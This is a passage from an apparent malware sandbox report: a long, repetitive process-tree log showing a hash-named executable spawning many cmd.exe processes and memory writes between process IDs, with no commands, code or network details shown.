wrote to memory of 948 216 cmd.exe 911 PID 216 wrote to memory of 948 216 cmd.exe 911 PID 676 wrote to memory of 1372 676 cmd.exe 912 PID 676 wrote to memory of 1372 676 cmd.exe 912 PID 676 wrote to memory of 1372 676 cmd.exe 912 PID 676 wrote to memory of 1372 676 cmd.exe 912 PID 672 wrote to memory of 1836 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 913 PID 672 wrote to memory of 1836 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 913 PID 672 wrote to memory of 1836 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 913 PID 672 wrote to memory of 1836 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 913 PID 1836 wrote to memory of 436 1836 cmd.exe 915 PID 1836 wrote to memory of 436 1836 cmd.exe 915 PID 1836 wrote to memory of 436 1836 cmd.exe 915 PID 1836 wrote to memory of 436 1836 cmd.exe 915 PID 1836 wrote to memory of 652 1836 cmd.exe 916 PID 1836 wrote to memory of 652 1836 cmd.exe 916 PID 1836 wrote to memory of 652 1836 cmd.exe 916 PID 1836 wrote to memory of 652 1836 cmd.exe 916 PID 1836 wrote to memory of 280 1836 cmd.exe 917 PID 1836 wrote to memory of 280 1836 cmd.exe 917 PID 1836 wrote to memory of 280 1836 cmd.exe 917 PID 1836 wrote to memory of 280 1836 cmd.exe 917 PID 280 wrote to memory of 1240 280 cmd.exe 918 PID 280 wrote to memory of 1240 280 cmd.exe 918 PID 280 wrote to memory of 1240 280 cmd.exe 918 PID 280 wrote to memory of 1240 280 cmd.exe 918 PID 1836 wrote to memory of 1180 1836 cmd.exe 919 PID 1836 wrote to memory of 1180 1836 cmd.exe 919 PID 1836 wrote to memory of 1180 1836 cmd.exe 919 PID 1836 wrote to memory of 1180 1836 cmd.exe 919 PID 672 wrote to memory of 360 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 920 PID 672 wrote to memory of 360 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 920 PID 672 wrote to memory of 360 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 920 PID 672 wrote to memory of 360 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 920 PID 360 wrote to memory of 1920 360 cmd.exe 922 PID 360 wrote to memory of 1920 360 cmd.exe 922 PID 360 wrote to memory of 1920 360 cmd.exe 922 PID 360 wrote to memory of 1920 360 cmd.exe 922 PID 360 wrote to memory of 756 360 cmd.exe 923 PID 360 wrote to memory of 756 360 cmd.exe 923 PID 360 wrote to memory of 756 360 cmd.exe 923 PID 360 wrote to memory of 756 360 cmd.exe 923 PID 360 wrote to memory of 1156 360 cmd.exe 924 PID 360 wrote to memory of 1156 360 cmd.exe 924 PID 360 wrote to memory of 1156 360 cmd.exe 924 PID 360 wrote to memory of 1156 360 cmd.exe 924 PID 1156 wrote to memory of 568 1156 cmd.exe 925 PID 1156 wrote to memory of 568 1156 cmd.exe 925 PID 1156 wrote to memory of 568 1156 cmd.exe 925 PID 1156 wrote to memory of 568 1156 cmd.exe 925 PID 360 wrote to memory of 1968 360 cmd.exe 926 PID 360 wrote to memory of 1968 360 cmd.exe 926 PID 360 wrote to memory of 1968 360 cmd.exe 926 PID 360 wrote to memory of 1968 360 cmd.exe 926 PID 672 wrote to memory of 1520 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 927 PID 672 wrote to memory of 1520 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 927 PID 672 wrote to memory of 1520 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 927 PID 672 wrote to memory of 1520 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 927 PID 1520 wrote to memory of 948 1520 cmd.exe 929 PID 1520 wrote to memory of 948 1520 cmd.exe 929 PID 1520 wrote to memory of 948 1520 cmd.exe 929 PID 1520 wrote to memory of 948 1520 cmd.exe 929 PID 1520 wrote to memory of 1080 1520 cmd.exe 930 PID 1520 wrote to memory of 1080 1520 cmd.exe 930 PID 1520 wrote to memory of 1080 1520 cmd.exe 930 PID 1520 wrote to memory of 1080 1520 cmd.exe 930 PID 1520 wrote to memory of 1052 1520 cmd.exe 931 PID 1520 wrote to memory of 1052 1520 cmd.exe 931 PID 1520 wrote to memory of 1052 1520 cmd.exe 931 PID 1520 wrote to memory of 1052 1520 cmd.exe 931 PID 1052 wrote to memory of 896 1052 cmd.exe 932 PID 1052 wrote to memory of 896 1052 cmd.exe 932 PID 1052 wrote to memory of 896 1052 cmd.exe 932 PID 1052 wrote to memory of 896 1052 cmd.exe 932 PID 1520 wrote to memory of 1644 1520 cmd.exe 933 PID 1520 wrote to memory of 1644 1520 cmd.exe 933 PID 1520 wrote to memory of 1644 1520 cmd.exe 933 PID 1520 wrote to memory of 1644 1520 cmd.exe 933 PID 672 wrote to memory of 652 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 934 PID 672 wrote to memory of 652 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 934 PID 672 wrote to memory of 652 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 934 PID 672 wrote to memory of 652 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 934 PID 652 wrote to memory of 1376 652 cmd.exe 936 PID 652 wrote to memory of 1376 652 cmd.exe 936 PID 652 wrote to memory of 1376 652 cmd.exe 936 PID 652 wrote to memory of 1376 652 cmd.exe 936 PID 652 wrote to memory of 228 652 cmd.exe 937 PID 652 wrote to memory of 228 652 cmd.exe 937 PID 652 wrote to memory of 228 652 cmd.exe 937 PID 652 wrote to memory of 228 652 cmd.exe 937 PID 652 wrote to memory of 1068 652 cmd.exe 938 PID 652 wrote to memory of 1068 652 cmd.exe 938 PID 652 wrote to memory of 1068 652 cmd.exe 938 PID 652 wrote to memory of 1068 652 cmd.exe 938 PID 1068 wrote to memory of 1512 1068 cmd.exe 939 PID 1068 wrote to memory of 1512 1068 cmd.exe 939 PID 1068 wrote to memory of 1512 1068 cmd.exe 939 PID 1068 wrote to memory of 1512 1068 cmd.exe 939 PID 652 wrote to memory of 744 652 cmd.exe 940 PID 652 wrote to memory of 744 652 cmd.exe 940 PID 652 wrote to memory of 744 652 cmd.exe 940 PID 652 wrote to memory of 744 652 cmd.exe 940 PID 672 wrote to memory of 756 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 941 PID 672 wrote to memory of 756 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 941 PID 672 wrote to memory of 756 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 941 PID 672 wrote to memory of 756 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 941 PID 756 wrote to memory of 1576 756 cmd.exe 943 PID 756 wrote to memory of 1576 756 cmd.exe 943 PID 756 wrote to memory of 1576 756 cmd.exe 943 PID 756 wrote to memory of 1576 756 cmd.exe 943 PID 756 wrote to memory of 1368 756 cmd.exe 944 PID 756 wrote to memory of 1368 756 cmd.exe 944 PID 756 wrote to memory of 1368 756 cmd.exe 944 PID 756 wrote to memory of 1368 756 cmd.exe 944 PID 756 wrote to memory of 544 756 cmd.exe 945 PID 756 wrote to memory of 544 756 cmd.exe 945 PID 756 wrote to memory of 544 756 cmd.exe 945 PID 756 wrote to memory of 544 756 cmd.exe 945 PID 544 wrote to memory of 224 544 cmd.exe 946 PID 544 wrote to memory of 224 544 cmd.exe 946 PID 544 wrote to memory of 224 544 cmd.exe 946 PID 544 wrote to memory of 224 544 cmd.exe 946 PID 756 wrote to memory of 2044 756 cmd.exe 947 PID 756 wrote to memory of 2044 756 cmd.exe 947 PID 756 wrote to memory of 2044 756 cmd.exe 947 PID 756 wrote to memory of 2044 756 cmd.exe 947 PID 672 wrote to memory of 1080 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 948 PID 672 wrote to memory of 1080 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 948 PID 672 wrote to memory of 1080 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 948 PID 672 wrote to memory of 1080 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 948 PID 1080 wrote to memory of 896 1080 cmd.exe 950 PID 1080 wrote to memory of 896 1080 cmd.exe 950 PID 1080 wrote to memory of 896 1080 cmd.exe 950 PID 1080 wrote to memory of 896 1080 cmd.exe 950 PID 1080 wrote to memory of 1472 1080 cmd.exe 951 PID 1080 wrote to memory of 1472 1080 cmd.exe 951 PID 1080 wrote to memory of 1472 1080 cmd.exe 951 PID 1080 wrote to memory of 1472 1080 cmd.exe 951 PID 1080 wrote to memory of 1896 1080 cmd.exe 952 PID 1080 wrote to memory of 1896 1080 cmd.exe 952 PID 1080 wrote to memory of 1896 1080 cmd.exe 952 PID 1080 wrote to memory of 1896 1080 cmd.exe 952 PID 1896 wrote to memory of 1520 1896 cmd.exe 953 PID 1896 wrote to memory of 1520 1896 cmd.exe 953 PID 1896 wrote to memory of 1520 1896 cmd.exe 953 PID 1896 wrote to memory of 1520 1896 cmd.exe 953 PID 1080 wrote to memory of 280 1080 cmd.exe 954 PID 1080 wrote to memory of 280 1080 cmd.exe 954 PID 1080 wrote to memory of 280 1080 cmd.exe 954 PID 1080 wrote to memory of 280 1080 cmd.exe 954 PID 672 wrote to memory of 1224 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 955 PID 672 wrote to memory of 1224 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 955 PID 672 wrote to memory of 1224 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 955 PID 672 wrote to memory of 1224 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 955 PID 1224 wrote to memory of 1068 1224 cmd.exe 957 PID 1224 wrote to memory of 1068 1224 cmd.exe 957 PID 1224 wrote to memory of 1068 1224 cmd.exe 957 PID 1224 wrote to memory of 1068 1224 cmd.exe 957 PID 1224 wrote to memory of 1960 1224 cmd.exe 958 PID 1224 wrote to memory of 1960 1224 cmd.exe 958 PID 1224 wrote to memory of 1960 1224 cmd.exe 958 PID 1224 wrote to memory of 1960 1224 cmd.exe 958 PID 1224 wrote to memory of 864 1224 cmd.exe 959 PID 1224 wrote to memory of 864 1224 cmd.exe 959 PID 1224 wrote to memory of 864 1224 cmd.exe 959 PID 1224 wrote to memory of 864 1224 cmd.exe 959 PID 864 wrote to memory of 1496 864 cmd.exe 960 PID 864 wrote to memory of 1496 864 cmd.exe 960 PID 864 wrote to memory of 1496 864 cmd.exe 960 PID 864 wrote to memory of 1496 864 cmd.exe 960 PID 1224 wrote to memory of 1156 1224 cmd.exe 961 PID 1224 wrote to memory of 1156 1224 cmd.exe 961 PID 1224 wrote to memory of 1156 1224 cmd.exe 961 PID 1224 wrote to memory of 1156 1224 cmd.exe 961 PID 672 wrote to memory of 1368 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 962 PID 672 wrote to memory of 1368 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 962 PID 672 wrote to memory of 1368 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 962 PID 672 wrote to memory of 1368 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 962 PID 1368 wrote to memory of 360 1368 cmd.exe 964 PID 1368 wrote to memory of 360 1368 cmd.exe 964 PID 1368 wrote to memory of 360 1368 cmd.exe 964 PID 1368 wrote to memory of 360 1368 cmd.exe 964 PID 1368 wrote to memory of 1848 1368 cmd.exe 965 PID 1368 wrote to memory of 1848 1368 cmd.exe 965 PID 1368 wrote to memory of 1848 1368 cmd.exe 965 PID 1368 wrote to memory of 1848 1368 cmd.exe 965 PID 1368 wrote to memory of 568 1368 cmd.exe 966 PID 1368 wrote to memory of 568 1368 cmd.exe 966 PID 1368 wrote to memory of 568 1368 cmd.exe 966 PID 1368 wrote to memory of 568 1368 cmd.exe 966 PID 568 wrote to memory of 1752 568 cmd.exe 967 PID 568 wrote to memory of 1752 568 cmd.exe 967 PID 568 wrote to memory of 1752 568 cmd.exe 967 PID 568 wrote to memory of 1752 568 cmd.exe 967 PID 1368 wrote to memory of 1064 1368 cmd.exe 968 PID 1368 wrote to memory of 1064 1368 cmd.exe 968 PID 1368 wrote to memory of 1064 1368 cmd.exe 968 PID 1368 wrote to memory of 1064 1368 cmd.exe 968 PID 672 wrote to memory of 236 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 969 PID 672 wrote to memory of 236 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 969 PID 672 wrote to memory of 236 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 969 PID 672 wrote to memory of 236 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 969 PID 236 wrote to memory of 1520 236 cmd.exe 971 PID 236 wrote to memory of 1520 236 cmd.exe 971 PID 236 wrote to memory of 1520 236 cmd.exe 971 PID 236 wrote to memory of 1520 236 cmd.exe 971 PID 236 wrote to memory of 212 236 cmd.exe 972 PID 236 wrote to memory of 212 236 cmd.exe 972 PID 236 wrote to memory of 212 236 cmd.exe 972 PID 236 wrote to memory of 212 236 cmd.exe 972 PID 236 wrote to memory of 280 236 cmd.exe 973 PID 236 wrote to memory of 280 236 cmd.exe 973 PID 236 wrote to memory of 280 236 cmd.exe 973 PID 236 wrote to memory of 280 236 cmd.exe 973 PID 280 wrote to memory of 1032 280 cmd.exe 974 PID 280 wrote to memory of 1032 280 cmd.exe 974 PID 280 wrote to memory of 1032 280 cmd.exe 974 PID 280 wrote to memory of 1032 280 cmd.exe 974 PID 236 wrote to memory of 364 236 cmd.exe 975 PID 236 wrote to memory of 364 236 cmd.exe 975 PID 236 wrote to memory of 364 236 cmd.exe 975 PID 236 wrote to memory of 364 236 cmd.exe 975 PID 672 wrote to memory of 744 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 976 PID 672 wrote to memory of 744 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 976 PID 672 wrote to memory of 744 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 976 PID 672 wrote to memory of 744 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 976 PID 744 wrote to memory of 1496 744 cmd.exe 978 PID 744 wrote to memory of 1496 744 cmd.exe 978 PID 744 wrote to memory of 1496 744 cmd.exe 978 PID 744 wrote to memory of 1496 744 cmd.exe 978 PID 744 wrote to memory of 952 744 cmd.exe 979 PID 744 wrote to memory of 952 744 cmd.exe 979 PID 744 wrote to memory of 952 744 cmd.exe 979 PID 744 wrote to memory of 952 744 cmd.exe 979 PID 744 wrote to memory of 1156 744 cmd.exe 980 PID 744 wrote to memory of 1156 744 cmd.exe 980 PID 744 wrote to memory of 1156 744 cmd.exe 980 PID 744 wrote to memory of 1156 744 cmd.exe 980 PID 1156 wrote to memory of 1224 1156 cmd.exe 981 PID 1156 wrote to memory of 1224 1156 cmd.exe 981 PID 1156 wrote to memory of 1224 1156 cmd.exe 981 PID 1156 wrote to memory of 1224 1156 cmd.exe 981 PID 744 wrote to memory of 1948 744 cmd.exe 982 PID 744 wrote to memory of 1948 744 cmd.exe 982 PID 744 wrote to memory of 1948 744 cmd.exe 982 PID 744 wrote to memory of 1948 744 cmd.exe 982 PID 672 wrote to memory of 948 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 983 PID 672 wrote to memory of 948 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 983 PID 672 wrote to memory of 948 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 983 PID 672 wrote to memory of 948 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 983 PID 948 wrote to memory of 1752 948 cmd.exe 985 PID 948 wrote to memory of 1752 948 cmd.exe 985 PID 948 wrote to memory of 1752 948 cmd.exe 985 PID 948 wrote to memory of 1752 948 cmd.exe 985 PID 948 wrote to memory of 1644 948 cmd.exe 986 PID 948 wrote to memory of 1644 948 cmd.exe 986 PID 948 wrote to memory of 1644 948 cmd.exe 986 PID 948 wrote to memory of 1644 948 cmd.exe 986 PID 948 wrote to memory of 1064 948 cmd.exe 987 PID 948 wrote to memory of 1064 948 cmd.exe 987 PID 948 wrote to memory of 1064 948 cmd.exe 987 PID 948 wrote to memory of 1064 948 cmd.exe 987 PID 1064 wrote to memory of 1368 1064 cmd.exe 988 PID 1064 wrote to memory of 1368 1064 cmd.exe 988 PID 1064 wrote to memory of 1368 1064 cmd.exe 988 PID 1064 wrote to memory of 1368 1064 cmd.exe 988 PID 948 wrote to memory of 1896 948 cmd.exe 989 PID 948 wrote to memory of 1896 948 cmd.exe 989 PID 948 wrote to memory of 1896 948 cmd.exe 989 PID 948 wrote to memory of 1896 948 cmd.exe 989 PID 672 wrote to memory of 228 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 990 PID 672 wrote to memory of 228 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 990 PID 672 wrote to memory of 228 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 990 PID 672 wrote to memory of 228 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 990 PID 228 wrote to memory of 1032 228 cmd.exe 992 PID 228 wrote to memory of 1032 228 cmd.exe 992 PID 228 wrote to memory of 1032 228 cmd.exe 992 PID 228 wrote to memory of 1032 228 cmd.exe 992 PID 228 wrote to memory of 1068 228 cmd.exe 993 PID 228 wrote to memory of 1068 228 cmd.exe 993 PID 228 wrote to memory of 1068 228 cmd.exe 993 PID 228 wrote to memory of 1068 228 cmd.exe 993 PID 228 wrote to memory of 364 228 cmd.exe 994 PID 228 wrote to memory of 364 228 cmd.exe 994 PID 228 wrote to memory of 364 228 cmd.exe 994 PID 228 wrote to memory of 364 228 cmd.exe 994 PID 364 wrote to memory of 236 364 cmd.exe 995 PID 364 wrote to memory of 236 364 cmd.exe 995 PID 364 wrote to memory of 236 364 cmd.exe 995 PID 364 wrote to memory of 236 364 cmd.exe 995 PID 228 wrote to memory of 864 228 cmd.exe 996 PID 228 wrote to memory of 864 228 cmd.exe 996 PID 228 wrote to memory of 864 228 cmd.exe 996 PID 228 wrote to memory of 864 228 cmd.exe 996 PID 672 wrote to memory of 904 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 997 PID 672 wrote to memory of 904 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 997 PID 672 wrote to memory of 904 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 997 PID 672 wrote to memory of 904 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 997 PID 904 wrote to memory of 1224 904 cmd.exe 999 PID 904 wrote to memory of 1224 904 cmd.exe 999 PID 904 wrote to memory of 1224 904 cmd.exe 999 PID 904 wrote to memory of 1224 904 cmd.exe 999 PID 904 wrote to memory of 360 904 cmd.exe 1000 PID 904 wrote to memory of 360 904 cmd.exe 1000 PID 904 wrote to memory of 360 904 cmd.exe 1000 PID 904 wrote to memory of 360 904 cmd.exe 1000 PID 904 wrote to memory of 1948 904 cmd.exe 1001 PID 904 wrote to memory of 1948 904 cmd.exe 1001 PID 904 wrote to memory of 1948 904 cmd.exe 1001 PID 904 wrote to memory of 1948 904 cmd.exe 1001 PID 1948 wrote to memory of 744 1948 cmd.exe 1002 PID 1948 wrote to memory of 744 1948 cmd.exe 1002 PID 1948 wrote to memory of 744 1948 cmd.exe 1002 PID 1948 wrote to memory of 744 1948 cmd.exe 1002 PID 904 wrote to memory of 568 904 cmd.exe 1003 PID 904 wrote to memory of 568 904 cmd.exe 1003 PID 904 wrote to memory of 568 904 cmd.exe 1003 PID 904 wrote to memory of 568 904 cmd.exe 1003 PID 672 wrote to memory of 1956 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1004 PID 672 wrote to memory of 1956 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1004 PID 672 wrote to memory of 1956 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1004 PID 672 wrote to memory of 1956 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1004 PID 1956 wrote to memory of 1368 1956 cmd.exe 1006 PID 1956 wrote to memory of 1368 1956 cmd.exe 1006 PID 1956 wrote to memory of 1368 1956 cmd.exe 1006 PID 1956 wrote to memory of 1368 1956 cmd.exe 1006 PID 1956 wrote to memory of 204 1956 cmd.exe 1007 PID 1956 wrote to memory of 204 1956 cmd.exe 1007 PID 1956 wrote to memory of 204 1956 cmd.exe 1007 PID 1956 wrote to memory of 204 1956 cmd.exe 1007 PID 1956 wrote to memory of 756 1956 cmd.exe 1008 PID 1956 wrote to memory of 756 1956 cmd.exe 1008 PID 1956 wrote to memory of 756 1956 cmd.exe 1008 PID 1956 wrote to memory of 756 1956 cmd.exe 1008 PID 756 wrote to memory of 436 756 cmd.exe 1009 PID 756 wrote to memory of 436 756 cmd.exe 1009 PID 756 wrote to memory of 436 756 cmd.exe 1009 PID 756 wrote to memory of 436 756 cmd.exe 1009 PID 1956 wrote to memory of 280 1956 cmd.exe 1010 PID 1956 wrote to memory of 280 1956 cmd.exe 1010 PID 1956 wrote to memory of 280 1956 cmd.exe 1010 PID 1956 wrote to memory of 280 1956 cmd.exe 1010 PID 672 wrote to memory of 1240 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1011 PID 672 wrote to memory of 1240 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1011 PID 672 wrote to memory of 1240 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1011 PID 672 wrote to memory of 1240 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1011 PID 1240 wrote to memory of 236 1240 cmd.exe 1013 PID 1240 wrote to memory of 236 1240 cmd.exe 1013 PID 1240 wrote to memory of 236 1240 cmd.exe 1013 PID 1240 wrote to memory of 236 1240 cmd.exe 1013 PID 1240 wrote to memory of 652 1240 cmd.exe 1014 PID 1240 wrote to memory of 652 1240 cmd.exe 1014 PID 1240 wrote to memory of 652 1240 cmd.exe 1014 PID 1240 wrote to memory of 652 1240 cmd.exe 1014 PID 1240 wrote to memory of 864 1240 cmd.exe 1015 PID 1240 wrote to memory of 864 1240 cmd.exe 1015 PID 1240 wrote to memory of 864 1240 cmd.exe 1015 PID 1240 wrote to memory of 864 1240 cmd.exe 1015 PID 864 wrote to memory of 228 864 cmd.exe 1016 PID 864 wrote to memory of 228 864 cmd.exe 1016 PID 864 wrote to memory of 228 864 cmd.exe 1016 PID 864 wrote to memory of 228 864 cmd.exe 1016 PID 1240 wrote to memory of 1156 1240 cmd.exe 1017 PID 1240 wrote to memory of 1156 1240 cmd.exe 1017 PID 1240 wrote to memory of 1156 1240 cmd.exe 1017 PID 1240 wrote to memory of 1156 1240 cmd.exe 1017 PID 672 wrote to memory of 2044 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1018 PID 672 wrote to memory of 2044 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1018 PID 672 wrote to memory of 2044 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1018 PID 672 wrote to memory of 2044 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1018 PID 2044 wrote to memory of 744 2044 cmd.exe 1020 PID 2044 wrote to memory of 744 2044 cmd.exe 1020 PID 2044 wrote to memory of 744 2044 cmd.exe 1020 PID 2044 wrote to memory of 744 2044 cmd.exe 1020 PID 2044 wrote to memory of 1752 2044 cmd.exe 1021 PID 2044 wrote to memory of 1752 2044 cmd.exe 1021 PID 2044 wrote to memory of 1752 2044 cmd.exe 1021 PID 2044 wrote to memory of 1752 2044 cmd.exe 1021 PID 2044 wrote to memory of 568 2044 cmd.exe 1022 PID 2044 wrote to memory of 568 2044 cmd.exe 1022 PID 2044 wrote to memory of 568 2044 cmd.exe 1022 PID 2044 wrote to memory of 568 2044 cmd.exe 1022 PID 568 wrote to memory of 904 568 cmd.exe 1023 PID 568 wrote to memory of 904 568 cmd.exe 1023 PID 568 wrote to memory of 904 568 cmd.exe 1023 PID 568 wrote to memory of 904 568 cmd.exe 1023 PID 2044 wrote to memory of 1064 2044 cmd.exe 1024 PID 2044 wrote to memory of 1064 2044 cmd.exe 1024 PID 2044 wrote to memory of 1064 2044 cmd.exe 1024 PID 2044 wrote to memory of 1064 2044 cmd.exe 1024 PID 672 wrote to memory of 1180 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1025 PID 672 wrote to memory of 1180 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1025 PID 672 wrote to memory of 1180 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1025 PID 672 wrote to memory of 1180 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1025 PID 1180 wrote to memory of 436 1180 cmd.exe 1027 PID 1180 wrote to memory of 436 1180 cmd.exe 1027 PID 1180 wrote to memory of 436 1180 cmd.exe 1027 PID 1180 wrote to memory of 436 1180 cmd.exe 1027 PID 1180 wrote to memory of 1032 1180 cmd.exe 1028 PID 1180 wrote to memory of 1032 1180 cmd.exe 1028 PID 1180 wrote to memory of 1032 1180 cmd.exe 1028 PID 1180 wrote to memory of 1032 1180 cmd.exe 1028 PID 1180 wrote to memory of 280 1180 cmd.exe 1029 PID 1180 wrote to memory of 280 1180 cmd.exe 1029 PID 1180 wrote to memory of 280 1180 cmd.exe 1029 PID 1180 wrote to memory of 280 1180 cmd.exe 1029 PID 280 wrote to memory of 1956 280 cmd.exe 1030 PID 280 wrote to memory of 1956 280 cmd.exe 1030 PID 280 wrote to memory of 1956 280 cmd.exe 1030 PID 280 wrote to memory of 1956 280 cmd.exe 1030 PID 1180 wrote to memory of 364 1180 cmd.exe 1031 PID 1180 wrote to memory of 364 1180 cmd.exe 1031 PID 1180 wrote to memory of 364 1180 cmd.exe 1031 PID 1180 wrote to memory of 364 1180 cmd.exe 1031 PID 672 wrote to memory of 1576 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1032 PID 672 wrote to memory of 1576 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1032 PID 672 wrote to memory of 1576 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1032 PID 672 wrote to memory of 1576 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1032 PID 1576 wrote to memory of 228 1576 cmd.exe 1034 PID 1576 wrote to memory of 228 1576 cmd.exe 1034 PID 1576 wrote to memory of 228 1576 cmd.exe 1034 PID 1576 wrote to memory of 228 1576 cmd.exe 1034 PID 1576 wrote to memory of 1224 1576 cmd.exe 1035 PID 1576 wrote to memory of 1224 1576 cmd.exe 1035 PID 1576 wrote to memory of 1224 1576 cmd.exe 1035 PID 1576 wrote to memory of 1224 1576 cmd.exe 1035 PID 1576 wrote to memory of 1156 1576 cmd.exe 1036 PID 1576 wrote to memory of 1156 1576 cmd.exe 1036 PID 1576 wrote to memory of 1156 1576 cmd.exe 1036 PID 1576 wrote to memory of 1156 1576 cmd.exe 1036 PID 1156 wrote to memory of 1240 1156 cmd.exe 1037 PID 1156 wrote to memory of 1240 1156 cmd.exe 1037 PID 1156 wrote to memory of 1240 1156 cmd.exe 1037 PID 1156 wrote to memory of 1240 1156 cmd.exe 1037 PID 1576 wrote to memory of 1216 1576 cmd.exe 1038 PID 1576 wrote to memory of 1216 1576 cmd.exe 1038 PID 1576 wrote to memory of 1216 1576 cmd.exe 1038 PID 1576 wrote to memory of 1216 1576 cmd.exe 1038 PID 672 wrote to memory of 1752 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1039 PID 672 wrote to memory of 1752 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1039 PID 672 wrote to memory of 1752 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1039 PID 672 wrote to memory of 1752 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 1039 PID 1752 wrote to memory of 1220 1752 cmd.exe 1041 PID 1752 wrote to memory of 1220 1752 cmd.exe 1041 PID 1752 wrote to memory of 1220 1752 cmd.exe 1041 PID 1752 wrote to memory of 1220 1752 cmd.exe 1041 PID 1752 wrote to memory of 1896 1752 cmd.exe 1042 PID 1752 wrote to memory of 1896 1752 cmd.exe 1042 PID 1752 wrote to memory of 1896 1752 cmd.exe 1042 PID 1752 wrote to memory of 1896 1752 cmd.exe 1042 PID 1752 wrote to memory of 1292 1752 cmd.exe 1043 PID 1752 wrote to memory of 1292 1752 cmd.exe 1043 PID 1752 wrote to memory of 1292 1752 cmd.exe 1043 PID 1752 wrote to memory of 1292 1752 cmd.exe 1043 PID 1292 wrote to memory of 524 1292 cmd.exe 1044 PID 1292 wrote to memory of 524 1292 cmd.exe 1044 PID 1292 wrote to memory of 524 1292 cmd.exe 1044 PID 1292 wrote to memory of 524 